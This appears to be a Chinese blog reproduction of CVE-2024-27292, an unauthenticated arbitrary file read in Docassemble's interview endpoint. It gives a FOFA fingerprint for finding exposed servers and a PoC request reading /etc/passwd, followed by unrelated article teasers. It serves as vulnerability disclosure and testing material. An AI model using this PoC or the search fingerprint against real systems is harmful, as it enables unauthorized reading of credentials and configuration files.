Docassemble interview 未授权任意文件读取漏洞复现(CVE-2024-27292)

news/2024/7/23 23:20:57 标签: 安全, web安全

0x01 产品简介

Docassemble是一款强大的开源工具,主要用于自动化生成和定制复杂文档,特别是在法律文档处理领域表现出色。由Jonathan Pyle个人开发者开发,是一个免费的开源专家系统,用于指导访谈和文档组装。Docassemble基于Python编写,充分利用了Python的灵活性和广泛的库支持。它采用YAML格式定义访谈逻辑,这种数据交换语言简洁且易于理解,使得非程序员也能轻松上手创建复杂的问答流程。

0x02 漏洞概述

Docassemble interview 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 影响范围

Docassemble <=1.4.96

0x04 复现环境

FOFA:icon_hash="-575790689"

0x05 漏洞复现 

PoC

GET /interview?i=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-

http://www.niftyadmin.cn/n/5546880.html

相关文章

x86芯片定制,Ethercat芯片定制,IP服务,适用于运动控制,工业总线等软硬一体机

x86芯片定制&#xff0c;Ethercat芯片定制 X86平台 我们的研发工程师已经积累了非常丰富的主板、整机设计经验&#xff0c;对接您的产品规格场景需求&#xff0c;快速交付样机&#xff0c;包含主板、BOX整机、平板电脑、CPCI等形态产品。降本、长生命周期、快速交付、及时响应…

深入理解基本数据结构:数组详解

引言 在计算机科学中&#xff0c;数据结构是存储、组织和管理数据的方式。数组作为最基础的数据结构之一&#xff0c;广泛应用于各种编程场景。在这篇博客中&#xff0c;我们将详细探讨数组的定义、特点、操作及其在不同编程语言中的实现。 什么是数组&#xff1f; 数组是一种…

在Spring Boot中实现RESTful API设计

在Spring Boot中实现RESTful API设计 大家好&#xff0c;我是微赚淘客系统3.0的小编&#xff0c;也是冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01; 1. RESTful API简介 1.1 什么是RESTful API&#xff1f; RESTful API是一种设计风格&#xff0c;基于HTTP协议…

Windows11配置WSL2支持代理上网

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 前言一、安装WSL2分发版二、配置步骤三、测试总结 前言 说起来本来这个功能我也不需要的&#xff0c;只是最近突然有个需求就顺便研究了下&#xff0c;WSL2默认的网…

CSS里的几个小知识

在 HTML 中&#xff0c; 标签的 rel 属性用于定义当前文档与被链接文档之间的关系。 在 中&#xff0c;rel“stylesheet” 表示被链接的文档&#xff08;即 mystyle.css&#xff09;是一个样式表&#xff08;style sheet&#xff09;&#xff0c;用于为当前页面提供样式定义。…

大语言模型与知识图谱结合发展方向

引言 在人工智能的发展历程中&#xff0c;大语言模型&#xff08;LLM&#xff09;的出现标志着一个重要的转折点。随着深度学习技术的突破和计算能力的提升&#xff0c;LLM以其前所未有的规模和复杂性&#xff0c;开启了迈向人工通用智能&#xff08;AGI&#xff09;的新浪潮。…

【哈希表】个人练习-Leetcode-2025. Maximum Number of Ways to Partition an Array

题目链接&#xff1a;https://leetcode.cn/problems/maximum-number-of-ways-to-partition-an-array/description/ 题目大意&#xff1a;给出一个数组nums[]和一个数字k。可以不改变数组&#xff0c;也可以将数组中某一个元素改为k。求改变/不改变后的数组中&#xff0c;能够找…

单对以太网:工业4.0时代的通信革命

单对以太网连接器概述 单对以太网&#xff08;Single Pair Ethernet&#xff0c;简称SPE&#xff09;是一种新兴的以太网技术&#xff0c;它通过一对双绞线实现数据传输&#xff0c;支持PoDL&#xff08;Power over Data Line&#xff09;技术&#xff0c;为终端设备提供电力供…